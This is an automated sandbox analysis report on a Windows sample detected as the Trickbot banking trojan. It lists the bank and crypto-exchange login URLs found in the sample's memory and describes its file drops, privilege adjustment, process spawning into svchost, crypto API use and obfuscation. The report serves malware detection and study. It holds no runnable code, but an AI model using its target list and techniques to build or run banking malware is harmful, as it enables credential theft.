Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://cardonebanking.com/authlogin.aspx?business
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmp, ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://cashmanagement.barclays.net
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmp, ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://cashmanagement.barclays.net/bnetservices/login.aspx
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://cbfm.saas.cashfac.com
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://cbfm.saas.cashfac.com/cbfm/Logon.aspx
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://cbonline.bankofscotland.co.uk
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://cbonline.bankofscotland.co.uk/PrimaryAuth/
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://cbonline.lloydsbank.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://cbonline.lloydsbank.com/PrimaryAuth/
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://chaseonline.chase.com/Logon.aspx
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://chaseonline.chase.com/MyAccount
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://chaseonline.chase.com/secure/CustomerCenter
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://chaseonline.chase.com/secure/Profile/
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://client.nedsecure-int.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://client.nedsecure-int.com/
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://clients.tilneybestinvest.co.uk
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://clients.tilneybestinvest.co.uk/ORM/Login.aspx
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://cmo.cibc.com
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://connect.secure.wellsfargo.com/auth/login/present?origin=biz
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://connect.secure.wellsfargo.com/auth/login/present?origin=cob
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://corporate.metrobankonline.co.uk
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://corporate.metrobankonline.co.uk/servlet/BrowserServlet
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://corporate.santander.co.uk
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://corporate.santander.co.uk/LOGSCU_NS_ENS
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://easyweb.td.com/waw/ezw/servlet
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://ebaer.juliusbaer.com
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://ebaer.juliusbaer.com/
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://ebank.turkishbank.co.uk
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://ebank.turkishbank.co.uk/Default2.aspx
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://ebanking-ch2.ubs.com
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://ebanking-ch2.ubs.com/workbench/Index.do
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://ebanking2.danskebank.co.uk
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://ebanking2.danskebank.co.uk/pub/logon/logon.aspx
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://esavings.shawbrook.co.uk
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://esavings.shawbrook.co.uk/BankFast/Shawbrook
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://espanol.chase.com/sdchaseonline/Logon
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://espanol.chase.com/sdchaseonline/MyAccounts
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://espanol.chase.com/sdchaseonline/secure/CustomerCenter
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.halifax-online.co.uk/personal/logon/login.jsp
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.hsbc.co.u
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.hsbc.co.uk
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.hsbc.co.uk/1/2/
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.huobi.pro
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.huobi.pro/login/
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.huobipro.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.huobipro.com/login/
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.internationalpayments.co.uk
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.internationalpayments.co.uk/
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.iombankiban
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.iombankibanking.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.iombankibanking.com/eai/IPB_EAI_Web/Service.do
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.iombankibanking.com/eai/IPB_EAI_Web/eai
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.kbinternetbanking.com:8443
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.kbinternetbanking.com:8443/ARCIB-NEWF/index.html
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.mymerrill.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.mymerrill.com/ml/home.aspx
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.natwestibanking.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.natwestibanking.com/eai/IPB_EAI_Web/
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.natwestibanking.com/eai/IPB_EAI_Web/Service.do
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.nwolb.com
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://www.nwolb.com/
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.nwolb.com/default.aspx
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.onlinebanking.iombank.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.onlinebanking.iombank.com/default.aspx
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.onlinebanking.natwestoffshore.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.onlinebanking.natwestoffshore.com/default.aspx
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.open24.ie
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.open24.ie/online/login.aspx
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.paymentnet.jpmorgan.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.paymentnet.jpmorgan.com/
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.rathbonesonline.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.rathbonesonline.com/template.LOGIN/
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.rbsdigital.com
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://www.rbsdigital.com/
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.rbsdigital.com/default.aspx
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.rbsidigital.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.rbsidigital.com/default.aspx
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.rbsiibanking.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.rbsiibanking.com/eai/IPB_EAI_Web/Service.do
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.rbsiibanking.com/ipb/IPB_Client_Web/Start.do
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.secure.bnpparibas.net
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.secure.bnpparibas.net/banque/portail/particulier/Fiche
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.standardlife.co.uk
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.standardlife.co.uk/c1/login.page
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.tescobank.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.tescobank.com/sss/auth
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.ulsterbankanytimebanking.
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.ulsterbankanytimebanking.co.uk
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://www.ulsterbankanytimebanking.co.uk/
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.ulsterbankanytimebanking.co.uk/default.aspx
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.ulsterbankanytimebanking.ie
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www.ulsterbankanytimebanking.ie/default.aspx
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.unity-online.co.uk
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.unity-online.co.uk/
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.wellsfargo.com/
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.wellsfargo.com/biz/
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.youinvest.co.uk
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.youinvest.co.uk/LogIn/username
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www1.hsbcprivatebank.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www1.hsbcprivatebank.com/1/2/
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www1.rbcbankusa.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www1.rbcbankusa.com/cgi-bin/rbaccess/rbunxcgi
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www1.scotiaconnect.scotiabank.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www2.firstdirect.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www2.firstdirect.com/1/2/
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www21.bmo.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www22.bmo.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www22.bmo.com/uiauth/AuthWeb/index.html
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www23.bmo.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www23.bmo.com/ctpauth/CTPEAILogin
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www6.rbc.com
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://www6.rbc.com/webapp/ukv0/signin/logon.xhtml
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://zaif.jp
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: https://zaif.jp/login
Uses HTTPS
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49198
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49197
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49196
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49197 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49198 -> 443

E-Banking Fraud:

Detected Trickbot Trojan
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe File created: C:\Users\user\AppData\Roaming\freenet\Modules\systeminfo32
Detected Trickbot e-Banking trojan config
Detected Trickbot e-Banking trojan inject config
Found strings which match known bank URLs

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003C76E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003DEF6B CryptAcquireContextA,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,memcpy,CryptDestroyKey,CryptReleaseContext
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003D3BB7 CryptAcquireContextA,CryptEncrypt,CryptDestroyKey,CryptImportKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_003976E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_003AEF6B CryptAcquireContextA,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,memcpy,CryptDestroyKey,CryptReleaseContext
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_003A3BB7 CryptAcquireContextA,CryptEncrypt,CryptDestroyKey,CryptImportKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext

System Summary:

PE file has a writeable .text section
Source: ucD6u0vstJ.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ucE7u0vttK.exe.1.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_00437B9E GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003C6740 NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_00396740 NtQueryInformationProcess,NtQueryInformationProcess
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003CC320 GetStartupInfoW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle
Creates mutexes
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Mutant created: \Sessions\1\BaseNamedObjects\789C000000000
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Mutant created: \BaseNamedObjects\789C000000000
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003DE04D
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003D9885
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003DD481
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003D257B
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003D69E7
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003D39C0
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003D8A1C
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003D9F4C
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003D6BFB
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003D1FE0
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_003AE04D
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_003AD481
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_003A9885
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_003A257B
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_003A69E7
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_003A39C0
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_003A8A1C
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_003A9F4C
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_003A6BFB
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_003A1FE0
PE file does not import any functions
Source: ucE7u0vttK.exe.1.dr Static PE information: No import functions for PE file found
Source: ucD6u0vstJ.exe Static PE information: No import functions for PE file found
Reads the hosts file
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe File read: C:\Windows\System32\drivers\etc\hosts
Sample reads its own file content
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe File read: C:\Users\user\Desktop\ucD6u0vstJ.exe
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)
Source: ucD6u0vstJ.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ucE7u0vttK.exe.1.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Classification label
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@10/16@2/5
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003E1FF0 LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003CF990 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003CC320 GetStartupInfoW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_0039C320 GetStartupInfoW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_0039F990 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_003B1FF0 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Contains functionality to enum processes or threads
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003C7850 CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,Process32NextW,OpenProcess,CloseHandle
Contains functionality to instantiate COM classes
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003CE850 CoCreateInstance,CoCreateInstance,CoCreateInstance
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003CF550 FindResourceW,LoadResource,LockResource
Creates files inside the user directory
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe File created: C:\Users\user\AppData\Roaming\freenet
PE file has an executable .text section and no other executable section
Source: ucD6u0vstJ.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Queries process information (via WMI, Win32_Process)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Reads software policies
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown Process created: C:\Users\user\Desktop\ucD6u0vstJ.exe 'C:\Users\user\Desktop\ucD6u0vstJ.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {2B3EACB2-7281-44E8-9006-229A29FB4963} S-1-5-18:NT AUTHORITY\System:Service:
Source: unknown Process created: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe Process created: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Process created: C:\Windows\System32\svchost.exe svchost.exe
Uses an in-process (OLE) Automation server
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Binary contains paths to debug symbols
Source: Binary string: C:\Work\A_Modules\Sysinfo\x86\Release\GetSystemInfo.pdbHS source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmp, svchost.exe, 00000007.00000000.13006790928.10001000.00000004.sdmp
Source: Binary string: C:\Work\A_Modules\Sysinfo\x86\Release\GetSystemInfo.pdb source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmp, svchost.exe, 00000007.00000000.13006790928.10001000.00000004.sdmp

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_00437B9E GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess
Uses code obfuscation techniques (call, push, ret)
